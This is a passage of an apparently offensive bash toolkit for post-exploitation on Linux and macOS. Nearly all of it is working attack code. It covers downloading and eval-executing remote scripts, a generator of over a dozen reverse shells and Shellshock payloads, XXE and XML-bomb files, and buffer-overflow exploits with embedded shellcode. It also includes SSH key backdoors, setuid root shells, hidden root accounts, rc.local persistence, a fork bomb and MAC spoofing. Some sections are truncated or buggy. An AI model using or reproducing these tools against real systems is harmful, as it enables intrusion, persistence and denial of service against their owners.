["2.6.17|2.6.18|2.6.19|2.6.20|2.6.21|2.6.22|2.6.23|2.6.24|2.6.24.1"]="CVE-2008-0900" 805 | ["2.6.11|2.6.12|2.6.13|2.6.14|2.6.15|2.6.16|2.6.17|2.6.18|2.6.19|2.6.20|2.6.21|2.6.22"]="CVE-2008-4210" 806 | ["2.6.25|2.6.26|2.6.27|2.6.28|2.6.29"]="CVE-2009-1185" 807 | ["2.6.25|2.6.26|2.6.27|2.6.28|2.6.29"]="CVE-2009-1337" 808 | ["2.4.[4-37]|2.6.[0-30]"]="CVE-2009-2692" 809 | ["2.6.[1-19]"]="CVE-2009-2698" 810 | ["2.4.[4-37]|2.6.[15-31]"]="CVE-2009-3547" ) 811 | kernel=`uname -r` 812 | for exploit in "${!exploits[@]}"; do 813 | echo "${kernel}|grep -E ${exploit}" > tmp 814 | check=$? 815 | if [ "$check" -eq 0 ]; then 816 | echo "${red}${bold}<.>${reset} ${exploits[$exploit]}" 817 | ((hits++)) 818 | fi 819 | done 820 | if [ $hits = 0 ]; then 821 | print_error "No exploits found" 822 | else 823 | echo "${magenta}(${hits} hits )${reset}" 824 | fi 825 | rm tmp 826 | fi 827 | } 828 | 829 | 830 | memexec(){ 831 | if [[ "$@" =~ .*-h.* ]]; then 832 | echo " 833 | ${underline}USAGE:${reset} 834 | dexec [-h] HOST URL 835 | ${underline}POSITIONAL ARGUMENTS:${reset} 836 | HOST Remote server address 837 | URL Full path of the script on the remote server 838 | ${underline}DESCRIPTION:${reset} 839 | Download and execute a remote bash script in memory" 840 | else 841 | if [ $# -eq 0 ]; then 842 | print_error "Specify the server address" 843 | elif [ $# -eq 1 ]; then 844 | print_error "Specify the URL of the script" 845 | else 846 | host=$1 847 | script=$2 848 | X=`curl -fsSL "http://${host}/${script}"` 849 | eval "$X" 850 | print_good "Succesfully executed ${script} from memory" 851 | fi 852 | fi 853 | } 854 | 855 | jshell(){ 856 | arguments_errors=0 857 | if [[ "$@" =~ .*-h.* ]]; then 858 | echo " 859 | ${underline}USAGE:${reset} 860 | jshell [-h] LHOST LPORT 861 | ${underline}POSITIONAL ARGUMENTS:${reset} 862 | LHOST Local address to listen on (set to "-" to automatically detect the ip) 863 | LPORT Local port to listen on 864 | ${underline}DESCRIPTION:${reset} 865 | Get a Javascript shell with XSS" 866 | else 867 | if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then 868 | lhost=$1 869 | elif [ "$1" = "-" ]; then 870 | lhost=`ip address | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'` 871 | else 872 | print_error "Wrong IP address format" 873 | ((arguments_errors++)) 874 | fi 875 | if [ "$2" -eq "$2" ] 2>/dev/null; then 876 | lport=$2 877 | else 878 | print_error "Wrong port format: integer required" 879 | ((arguments_errors++)) 880 | fi 881 | if [ $arguments_errors = 0 ]; then 882 | if [ "$OSTYPE" = "darwin" ]; then 883 | netcat_cmd="nc -nlvk ${lport}" 884 | else 885 | netcat_cmd="nc -nlvp ${lport}" 886 | fi 887 | payload="" 888 | print_good "Generated JS payload:" 889 | echo ${payload} 890 | echo 891 | print_info "Waiting for the payload to be executed..." 892 | out=`$netcat_cmd` 893 | fi 894 | fi 895 | } 896 | 897 | shellcode(){ 898 | if [[ "$@" =~ .*-h.* ]]; then 899 | echo " 900 | ${underline}USAGE:${reset} 901 | shellcode [-h] SHELLCODE 902 | ${underline}POSITIONAL ARGUMENTS:${reset} 903 | SHELLCODE Shellcode to execute in '\x' escaped form 904 | ${underline}DESCRIPTION:${reset} 905 | Execute specified shellcode" 906 | else 907 | if [ $# -eq 0 ]; then 908 | print_error "Specify the shellcode to run" 909 | else 910 | shellcode=$1 911 | cat >executor.c <dos.yml <dos.xml < 960 | 962 | 963 | 964 | 965 | 966 | 967 | 968 | 969 | 970 | 971 | 972 | ]> 973 | &lol9; 974 | EOL 975 | print_good "Saved payload as ${bold}dos.xml${reset}" 976 | else 977 | print_error "No such format" 978 | fi 979 | fi 980 | fi 981 | } 982 | 983 | xxe(){ 984 | if [[ "$@" =~ .*-h.* ]]; then 985 | echo " 986 | ${underline}USAGE:${reset} 987 | xxe [-h] [PAYLOAD] 988 | ${underline}OPTIONAL POSITIONAL ARGUMENTS:${reset} 989 | [PAYLOAD] Payload to execute inside the entity (default: file:///etc/passwd) 990 | ${underline}DESCRIPTION:${reset} 991 | Generate a XML External Entity Injection file" 992 | else 993 | if [ $# -eq 0 ]; then 994 | payload="file:///etc/passwd" 995 | else 996 | payload=$1 997 | fi 998 | cat >file.xml < 1000 | 1001 | ]> 1002 | 1003 | &xxe; 1004 | mypass 1005 | 1006 | EOL 1007 | print_good "Generated ${bold}file.xml${reset} with ${bold}${payload}${reset} payload" 1008 | fi 1009 | } 1010 | 1011 | mod(){ 1012 | if [[ "$@" =~ .*-h.* ]]; then 1013 | echo " 1014 | ${underline}USAGE:${reset} 1015 | mod [-h] ACTION EXTENSION TEXT 1016 | ${underline}POSITIONAL ARGUMENTS:${reset} 1017 | ACTION Operation to perform with the text {append, prepend, replace, remove} 1018 | EXTENSION File extension 1019 | TEXT Text to append to files 1020 | ${underline}DESCRIPTION:${reset} 1021 | Modify contents of every file with specified extension in current directory" 1022 | else 1023 | if [ $# -eq 0 ]; then 1024 | print_error "Specify the ACTION" 1025 | elif [ $# -eq 1 ]; then 1026 | print_error "Specify the EXTENSION" 1027 | elif [ $# -eq 2 ]; then 1028 | print_error "Specify the TEXT" 1029 | else 1030 | files=`ls` 1031 | action=$1 1032 | extension=$2 1033 | text=$3 1034 | for file in ${files[*]}; do 1035 | if [[ "$file" =~ .*${extension} ]]; then 1036 | if [ $action = "append" ]; then 1037 | cat $text >> $file 1038 | elif [ $action = "prepend" ]; then 1039 | printf '%s\n%s\n' $text "$(cat $file)" > $file 1040 | elif [ $action = "replace" ]; then 1041 | echo $text > $file 1042 | elif [ $action = "remove" ]; then 1043 | sed -i '/pattern/d' $file 1044 | else 1045 | print_error "No such action. Available choices: {append, prepend, replace}" 1046 | fi 1047 | fi 1048 | done 1049 | fi 1050 | fi 1051 | } 1052 | 1053 | 1054 | getdbus(){ 1055 | if [[ "$@" =~ .*-h.* ]]; then 1056 | echo " 1057 | ${underline}USAGE:${reset} 1058 | getdbus [-h] 1059 | ${underline}DESCRIPTION:${reset} 1060 | List all available netbus services" 1061 | else 1062 | print_good "Dbus services for system:" 1063 | dbus-send --system --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 1064 | print_good "Dbus services for session:" 1065 | dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-repl 1066 | fi 1067 | 1068 | } 1069 | 1070 | 1071 | getsec(){ 1072 | if [[ "$@" =~ .*-h.* ]]; then 1073 | echo " 1074 | ${underline}USAGE:${reset} 1075 | getsec [-h] 1076 | ${underline}DESCRIPTION:${reset} 1077 | List security services" 1078 | else 1079 | none=0 1080 | selinuxenabled >/dev/null 2>/dev/null 1081 | if echo $? | grep -q 0; then 1082 | print_error "SELinux is enabled." 1083 | ((none++)) 1084 | fi 1085 | type aa-status >/dev/null 2>/dev/null 1086 | if echo $? | grep -q 0; then 1087 | print_error "AppArmor is probably installed." 1088 | ((none++)) 1089 | fi 1090 | if cat /proc/self/status | grep -q PaX; then 1091 | print_error "GrSec and PaX are present" 1092 | ((none++)) 1093 | fi 1094 | if [ $none -eq 0 ]; then 1095 | print_good "No security measures detected" 1096 | fi 1097 | fi 1098 | 1099 | } 1100 | 1101 | getidle(){ 1102 | if [[ "$@" =~ .*-h.* ]]; then 1103 | echo " 1104 | ${underline}USAGE:${reset} 1105 | getidle [-h] 1106 | ${underline}DESCRIPTION:${reset} 1107 | Get active PTYs ant their idle time" 1108 | else 1109 | ptys=`ls /dev/pts | grep '[[:digit:]]' | sort -g | tr '\n' ' '` 1110 | echo $ptys | tr ' ' '\n' | while read i;do 1111 | echo -ne "[*] PTY $i has been idle for " 1112 | idler=`stat -t /dev/pts/$i | awk -F " " '{ print $12 }'` 1113 | echo -ne "$((`date +%s` - $idler)) seconds.\n" 1114 | done 1115 | fi 1116 | 1117 | } 1118 | 1119 | keyinstall(){ 1120 | if [[ "$@" =~ .*-h.* ]]; then 1121 | echo " 1122 | ${underline}USAGE:${reset} 1123 | keyinstall [-h] KEY 1124 | ${underline}POSITIONAL ARGUMENTS:${reset} 1125 | KEY RSA key to add 1126 | ${underline}DESCRIPTION:${reset} 1127 | Add your RSA key to list of SSH authorized keys" 1128 | else 1129 | if [ $# -eq 0 ]; then 1130 | print_error "Specify the KEY" 1131 | else 1132 | key=$1 1133 | touch /dev/shm/.q/.ssh 1134 | touch -r / 1135 | sshkey="ssh-rsa $key `whoami`@`hostname`" 1136 | echo $sshkey >> ~/.ssh/authorized_keys 1137 | print_good "Added $key to list of authorized keys" 1138 | fi 1139 | fi 1140 | 1141 | } 1142 | 1143 | revshellgen(){ 1144 | function bash_shell(){ 1145 | echo -e "bash -i >& /dev/tcp/$ipaddr/$port 0>&1" 1146 | } 1147 | function perl_shell(){ 1148 | echo -e "perl -e 'use Socket; \$i=\"$ipaddr\" ;\$p=$port ;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" 1149 | } 1150 | function python_shell(){ 1151 | echo -e "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(( \"$ipaddr\",$port ));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" 1152 | } 1153 | function php_shell(){ 1154 | echo -e "php -r '\$sock=fsockopen(\" $ipaddr\",$port );exec(\"/bin/sh -i <&3 >&3 2>&3\");'" 1155 | } 1156 | function ruby_shell(){ 1157 | echo -e "ruby -rsocket -e'f=TCPSocket.open( \"$ipaddr\",$port ).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'" 1158 | } 1159 | function netcat1_shell(){ 1160 | echo -e "nc -e /bin/sh $ipaddr $port \n" 1161 | } 1162 | function netcat2_shell(){ 1163 | echo -e "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ipaddr $port >/tmp/f\n" 1164 | } 1165 | function netcat3_shell(){ 1166 | echo -e "rm /tmp/l;mknod /tmp/l p;/bin/sh 0/tmp/l" 1167 | } 1168 | function java_shell(){ 1169 | echo -e """ 1170 | r = Runtime.getRuntime() 1171 | p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/ $ipaddr / $port ;cat <&5 | while read line; do \$line 2>&5 >&5; done\"] as String[]) 1172 | p.waitFor() 1173 | """ 1174 | } 1175 | function shellshock_rce_shell(){ 1176 | echo -e "wget -U \"() { test;};echo \"Content-type: text/plain\"; echo; echo; YOUR_COMMAND \" http:// TARGET_IP /cgi-bin/status\n" 1177 | } 1178 | function shellshock_bind_shell(){ 1179 | echo "echo -e \"HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () { :;}; /usr/bin/nc -l -p 4444 -e /bin/sh\\r\\nHost: \\r\\nConnection: close\\r\\n\\r\\n\" | nc 80" 1180 | } 1181 | function lua_shell(){ 1182 | echo -e "lua5.1 -e 'local host,port = \" $ipaddr \", $port local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host,port); while true do local cmd,status,partial = tcp:receive() local f = io.popen(cmd,'r') local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'" 1183 | } 1184 | function powershell_shell(){ 1185 | echo -e "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\" $ipaddr \", $port );\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" 1186 | } 1187 | function telnet_shell(){ 1188 | echo -e "telnet $ipaddr $port | /bin/bash | telnet $ipaddr 9999 " 1189 | } 1190 | if [[ "$@" =~ .*-h.* ]]; then 1191 | echo " 1192 | ${underline}USAGE:${reset} 1193 | revshellgen [-h] [-l] TYPE LHOST LPORT 1194 | ${underline}POSITIONAL ARGUMENTS:${reset} 1195 | -l Show available reverse shells 1196 | ${underline}POSITIONAL ARGUMENTS:${reset} 1197 | TYPE Type of the shell to use 1198 | LHOST Listening host 1199 | LPORT Listening port 1200 | ${underline}DESCRIPTION:${reset} 1201 | Output a reverse shell of chosen type" 1202 | elif [[ "$@" =~ .*-l.* ]]; then 1203 | print_good "Available reverse shells:" 1204 | echo " 1205 | 1) bash_shell 1206 | 2) ruby_shell 1207 | 3) perl_shell 1208 | 4) netcat1_shell 1209 | 5) netcat2_shell 1210 | 6) netcat3_shell 1211 | 7) python_shell 1212 | 8) java_shell 1213 | 9) php_shell 1214 | 10) shellshock_shell 1215 | 11) lua_shell 1216 | 12) powershell_shell 1217 | 13) telnet_shell" 1218 | else 1219 | type=$1 1220 | ipaddr=$2 1221 | port=$3 1222 | $type 1223 | fi 1224 | } 1225 | 1226 | 1227 | ldexec(){ 1228 | if [[ "$@" =~ .*-h.* ]]; then 1229 | echo " 1230 | ${underline}USAGE:${reset} 1231 | ldexec [-h] FILE 1232 | ${underline}POSITIONAL ARGUMENTS:${reset} 1233 | FILE File to execute 1234 | ${underline}DESCRIPTION:${reset} 1235 | Execute file without execution permission bit set" 1236 | else 1237 | if [ $# -eq 0 ]; then 1238 | print_error "Specify the FILE" 1239 | else 1240 | file=$1 1241 | cp $file /tmp/abcde 1242 | chmod a-x /tmp/abcde 1243 | linker=`ls /lib|grep -oE "ld-linux.*.so.2"` 1244 | /lib/$linker /tmp/abcde 1245 | fi 1246 | fi 1247 | 1248 | } 1249 | 1250 | forkbomb(){ 1251 | if [[ "$@" =~ .*-h.* ]]; then 1252 | echo " 1253 | ${underline}USAGE:${reset} 1254 | forkbomb [-h] [INTERVAL] 1255 | ${underline}POSITIONAL ARGUMENTS:${reset} 1256 | INTERVAL Number of seconds of optional delay 1257 | ${underline}DESCRIPTION:${reset} 1258 | Run a forkbomb" 1259 | else 1260 | if [ $# -eq 1 ]; then 1261 | delay=$1 1262 | sleep $delay 1263 | else 1264 | :(){ :|:& };: 1265 | fi 1266 | fi 1267 | } 1268 | 1269 | machange(){ 1270 | if [[ "$@" =~ .*-h.* ]]; then 1271 | echo " 1272 | ${underline}USAGE:${reset} 1273 | machange [-h] [IFACE] [MAC] 1274 | ${underline}POSITIONAL ARGUMENTS:${reset} 1275 | IFACE Interface to change address on 1276 | MAC New MAC adderss 1277 | ${underline}DESCRIPTION:${reset} 1278 | Change MAC address" 1279 | else 1280 | if [ $# -eq 0 ]; then 1281 | print_error "Not enough arguments" 1282 | elif [ $# -eq 1 ]; then 1283 | iface=$1 1284 | elif [ $# -eq 2 ]; then 1285 | mac=$2 1286 | else 1287 | iface="eth0" 1288 | fi 1289 | /etc/init.d/networking stop 1290 | ifconfig $iface hw ether $mac 1291 | /etc/init.d/networking start 1292 | if [ $# -eq 0 ]; then 1293 | print_good "Changed mac address to $mac" 1294 | fi 1295 | fi 1296 | } 1297 | 1298 | 1299 | aslray(){ 1300 | if [[ "$@" =~ .*-h.* ]]; then 1301 | echo " 1302 | ${underline}USAGE:${reset} 1303 | aslray BINARY BUFSIZE [SHELLCODE] 1304 | ${underline}POSITIONAL ARGUMENTS:${reset} 1305 | INTERFACE Interface to perform stealthing on 1306 | BUFSIZE Buffer to pass as an argument 1307 | SHELLCODE Shellcode to execute (default: spawn shell) 1308 | ${underline}DESCRIPTION:${reset} 1309 | ALSR and DEP/NX bypass for x86/x86_64 (stack smashing) " 1310 | else 1311 | if [ $# -eq 0 ]; then 1312 | print_error "Specify BINARY" 1313 | elif [ $# -eq 1 ]; then 1314 | print_error "Specify BUFSIZE" 1315 | else 1316 | FILE=$1 1317 | BUFFER=$2 1318 | SC=$3 1319 | x86=$(file $FILE | grep '32-bit') 1320 | if [[ "$x86" ]]; then 1321 | print_info 'ELF IS 32-BIT' 1322 | if [[ `readelf -l $FILE | grep RWE` ]]; then 1323 | print_info 'STACK IS EXECUTABLE' 1324 | print_info 'SPRAYING NOPSLED AND SHELLCODE...' 1325 | if [[ "$SC" != "" ]] 1326 | then 1327 | SC=$(echo $SC | sed s/x/\\\\x/g) 1328 | export SHELLCODE=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne $SC) 1329 | else 1330 | export SHELLCODE=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80') 1331 | fi 1332 | print_info 'EXPLOITING...' 1333 | $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz') 1334 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x80\x80\xfc\xff') ; done 1335 | else 1336 | print_good 'DEP/NX DETECTED' 1337 | pprint_info 'SPRAYING SHELL...' 1338 | export shell0=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1339 | export shell1=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1340 | export shell2=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1341 | export shell3=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1342 | export shell4=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1343 | export shell5=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1344 | export shell6=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1345 | export shell7=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1346 | export shell8=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1347 | export shell9=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1348 | print_info 'EXPLOITING... may take a while, if stuck then retry' 1349 | sleep 2 1350 | TYPE=/etc/os-release 1351 | if [[ `grep jessie $TYPE` ]] 1352 | then 1353 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\xe0\x83\x58\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done 1354 | # TODO use 'timeout 1 $FILE' in order not to stuck, but how to spawn a shell? 1355 | elif [[ `grep stretch $TYPE` ]] 1356 | then 1357 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x40\xe8\x62\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done 1358 | elif [[ `grep Xenial $TYPE` ]] 1359 | then 1360 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x40\xe9\x63\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done 1361 | elif [[ `grep Trusty $TYPE` ]] 1362 | then 1363 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x70\xce\x56\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done 1364 | else 1365 | 'NOT DEBIAN OR UBUNTU!!!' 1366 | exit 2 1367 | fi 1368 | fi 1369 | print_info "Retry if the shellcode wasn't executed until now" 1370 | else 1371 | print_info 'ELF IS 64-BIT' 1372 | print_info 'SPRAYING NOPSLED AND SHELLCODE...' 1373 | if [[ "$SC" != "" ]] 1374 | then 1375 | SC=$(echo $SC | sed s/x/\\\\x/g) 1376 | for n in {1..10} ; do export SHELLCODE$n=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne $SC); done 1377 | else 1378 | for n in {1..10} ; do export SHELLCODE$n=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'); done 1379 | fi 1380 | print_good 'EXPLOITING... may take a while' 1381 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -ne '\x80\x80\x80\x80\xfc\x7f') ; done 1382 | fi 1383 | fi 1384 | 1385 | fi 1386 | } 1387 | 1388 | 1389 | uperm(){ #FINISH THIS 1390 | if [[ "$@" =~ .*-h.* ]]; then 1391 | echo " 1392 | ${underline}USAGE:${reset} 1393 | uperm [-h] 1394 | ${underline}DESCRIPTION:${reset} 1395 | Show files permissions for current user" 1396 | else 1397 | : 1398 | fi 1399 | } 1400 | 1401 | watch(){ 1402 | : 1403 | } 1404 | 1405 | shellshock(){ 1406 | if [[ "$@" =~ .*-h.* ]]; then 1407 | echo " 1408 | ${underline}USAGE:${reset} 1409 | shellshock [-h] 1410 | ${underline}DESCRIPTION:${reset} 1411 | Check for shellshock vulnerabilities" 1412 | else 1413 | hits=0 1414 | env X='() { :; }; echo "${green}${bold}}CVE-2014-6271${reset}"' bash -c id 1415 | if [ $# -eq 0 ]; then 1416 | print_error "Check #1 - not vulnerable" 1417 | fi 1418 | env X='() { (a)=>\' bash -c "${green}${bold}CVE-2014-7169${reset}"; cat echo 1419 | if [ $# -eq 0 ]; then 1420 | print_error "Check #2 - not vulnerable" 1421 | fi 1422 | bash -c 'true </dev/null; then 1450 | if [ $# -eq 0 ]; then 1451 | print_error "Specify IFACE and PORTS" 1452 | elif [ $# -eq 1 ]; then 1453 | print_error "Specify PORTS" 1454 | else 1455 | iface="eth0" 1456 | sudo iptables -P INPUT DROP 1457 | IFS=',' read -ra PORTS <<< "$ports" 1458 | for port in ${PORTS[*]}; do 1459 | iptables -A INPUT -i $iface -p tcp --dport $port -j ACCEPT #Check this shit 1460 | done 1461 | print_good "Blocked all ports except whitelisted" 1462 | fi 1463 | else 1464 | print_error "Unable to perform port blocking: iptables is not installed" 1465 | fi 1466 | fi 1467 | } 1468 | 1469 | persist(){ 1470 | if [[ "$@" =~ .*-h.* ]]; then 1471 | echo " 1472 | ${underline}USAGE:${reset} 1473 | persist [-h] COMMAND 1474 | ${underline}POSITIONAL ARGUMENTS:${reset} 1475 | COMMAND Command to be launched on every startup 1476 | ${underline}DESCRIPTION:${reset} 1477 | Specify command that will be launched on every boot. 1478 | It will be encoded and written to /etc/rc.local." 1479 | else 1480 | if [ $# -eq 0 ]; then 1481 | print_error "Specify the command" 1482 | else 1483 | root_check 1484 | command=$1 1485 | encode_cmd="echo -n '$command' | base64" 1486 | encoded=$(eval "$encode_cmd") 1487 | decode_cmd="echo -n '$encoded' | base64 -d" 1488 | decoder="$""(eval ""$decode_cmd)" 1489 | sudo echo $decoder >> /etc/rc.local 1490 | print_good "Appended encoded command to /etc/rc.local" 1491 | fi 1492 | fi 1493 | } 1494 | 1495 | rootshell(){ 1496 | if [[ "$@" =~ .*-h.* ]]; then 1497 | echo " 1498 | ${underline}USAGE:${reset} 1499 | rootshell [-h] 1500 | ${underline}DESCRIPTION:${reset} 1501 | Create a rootshell binary under /tmp directory" 1502 | else 1503 | root_check 1504 | local shellfile=${1-$SHELL} 1505 | local rootshell=${2-$(mktemp -u)} 1506 | cp "$shellfile" "$rootshell" 1507 | chmod u+s "$rootshell" 1508 | print_good "Created a rootshell" 1509 | ls -la "$rootshell" 1510 | fi 1511 | } 1512 | 1513 | usradd(){ 1514 | if [[ "$@" =~ .*-h.* ]]; then 1515 | echo " 1516 | ${underline}USAGE:${reset} 1517 | useradd [-h] USERNAME 1518 | ${underline}POSITIONAL ARGUMENTS:${reset} 1519 | USERNAME Name of the new user 1520 | ${underline}DESCRIPTION:${reset} 1521 | Create a new hidden root user on host (currently OSX only)" 1522 | else 1523 | root_check() 1524 | if [ $# -eq 0 ]; then 1525 | print_error "Specify the username" 1526 | else 1527 | user=$1 1528 | if [ $platform == "osx" ]; then 1529 | dscl . -create /Users/$user PrimaryGroupID 80 || print_good "Created root user" 1530 | sudo dscl . create /Users/$user IsHidden 1 || print_good "Succesfully hid user" 1531 | sudo mv /Users/$user /var/$user || print_good "Moved $user home directory under /var" 1532 | sudo dscl . -create /Users/$user NFSHomeDirectory /var/$user || print_good "Succesfully updated new home directory" 1533 | sudo dscl . -delete "/SharePoints/$user's Public Folder" || print_good "Deleted $user original home directory" 1534 | else 1535 | print_error "Platform is not supported" 1536 | fi 1537 | fi 1538 | fi 1539 | } 1540 | 1541 | swapdump(){ 1542 | if [[ "$@" =~ .*-h.* ]]; then 1543 | echo " 1544 | ${underline}USAGE:${reset} 1545 | swapdump [-h] 1546 | ${underline}DESCRIPTION:${reset} 1547 | Search for in-memory credentials" 1548 | else 1549 | root_check 1550 | fi 1551 | 1552 | } 1553 | 1554 | forward(){ 1555 | if [[ "$@" =~ .*-h.* ]]; then 1556 | echo " 1557 | ${underline}USAGE:${reset} 1558 | forward [ssh|ssh_vpn] USERNAME HOST PORT 1559 | ${underline}DESCRIPTION:${reset} 1560 | Perform ssh port forwarding 1561 | ${underline}POSITIONAL ARGUMENTS:${reset} 1562 | USERNAME Name of the ssh user 1563 | HOST Target ip 1564 | PORT Port to forward 1565 | " 1566 | else 1567 | root_check() 1568 | if [ $# -eq 0 ]; then 1569 | print_error "Specify mode" 1570 | elif [ $# -eq 1 ]; then 1571 | print_error "Specify USERNAME" 1572 | elif [ $# -eq 2 ]; then 1573 | print_error "Specify HOST" 1574 | elif [ $# -eq 3 ]; then 1575 | print_error "Specify PORT" 1576 | else 1577 | mode=$1 1578 | username=$2 1579 | host=$3 1580 | port=$4 1581 | if [ $1 == "ssh" ]; then 1582 | ssh $username@$host -L $port:$host:$port 1583 | if [ $# -eq 0 ]; then 1584 | print_good "Port forward performed succesfully" 1585 | else 1586 | command_error_exit 1587 | fi 1588 | elif [ $1 == "ssh_vpn" ]; then 1589 | : 1590 | else 1591 | print_error "No such option" 1592 | fi 1593 | fi 1594 | fi 1595 | 1596 | 1597 | } 1598 | 1599 | ghost(){ 1600 | if [[ "$@" =~ .*-h.* ]]; then 1601 | echo " 1602 | ${underline}USAGE:${reset} 1603 | ghost on|off [INTERFACE] 1604 | ${underline}POSITIONAL ARGUMENTS:${reset} 1605 | INTERFACE Interface to perform stealthing on 1606 | ${underline}DESCRIPTION:${reset} 1607 | Disappear from the net" 1608 | else 1609 | root_check() 1610 | if [ $# -eq 1 ]; then 1611 | iface="eth0" 1612 | elif [ $# -eq 2 ]; then 1613 | iface=$2 1614 | fi 1615 | if [ $# -eq 0 ]; then 1616 | print_error "Specify the switch [on|off]" 1617 | else 1618 | SWITCH=$1 1619 | INTERFACE=$2 1620 | TMPMAC=/tmp/mac.ghost 1621 | ORGHOST=/tmp/host.ghost 1622 | ORGMAC="" 1623 | CMD=$( which ifconfig 2>/dev/null) 1624 | if [[ $? -gt 0 ]]; then 1625 | CMD=$( which ip ) 1626 | fi 1627 | if [[ "$SWITCH" = "on" ]] 1628 | then 1629 | if [ ! $(which ethtool) ] && [ ! -f /etc/udev/rules.d/70-persistent-net.rules ] 1630 | then 1631 | if [[ $CMD =~ .*ifconfig ]]; then 1632 | ORGMAC=$( $CMD $INTERFACE | grep ether | awk '{print $2}' ) 1633 | else 1634 | ORGMAC=$( $CMD link show $INTERFACE | awk '$1~/^link/{print $2}' ) 1635 | fi 1636 | else 1637 | if [[ $(which ethtool) ]] 1638 | then 1639 | ORGMAC=$(ethtool -P $INTERFACE) 1640 | ORGMAC=${ORGMAC#*:} 1641 | else 1642 | ORGMAC=$(cat /etc/udev/rules.d/70-persistent-net.rules | grep $INTERFACE | cut -d '"' -f 8) 1643 | fi 1644 | fi 1645 | echo -n $ORGMAC > $TMPMAC 1646 | print_info 'Spoofing MAC address ...' 1647 | /etc/init.d/network-manager stop &>/dev/null 1648 | if [[ $CMD =~ .*ifconfig ]]; then 1649 | $CMD $INTERFACE down 1650 | else 1651 | $CMD link set $INTERFACE down 1652 | fi 1653 | if [[ $? -ne 0 ]] 1654 | then 1655 | print_error "Wrong interface" 1656 | exit 3 1657 | fi 1658 | MAC=$(head -c 6 /proc/sys/kernel/random/uuid | sed 's/^\(..\)\(..\)\(..\).*$/48:0f:cf:\1:\2:\3/') 1659 | if [[ $CMD =~ .*ifconfig ]]; then 1660 | $CMD $INTERFACE hw ether $MAC 1661 | else 1662 | $CMD link set dev $INTERFACE address $MAC 1663 | fi 1664 | print_good "New MAC address: $MAC" 1665 | print_info 'Configuring kernel to restrict ARP/NDP requests in linking network mode ...' 1666 | sysctl net.ipv4.conf.$INTERFACE.arp_ignore=8 > /dev/null 1667 | sysctl net.ipv4.conf.$INTERFACE.arp_announce=2 > /dev/null 1668 | ip6tables -I INPUT 1 -i $INTERFACE 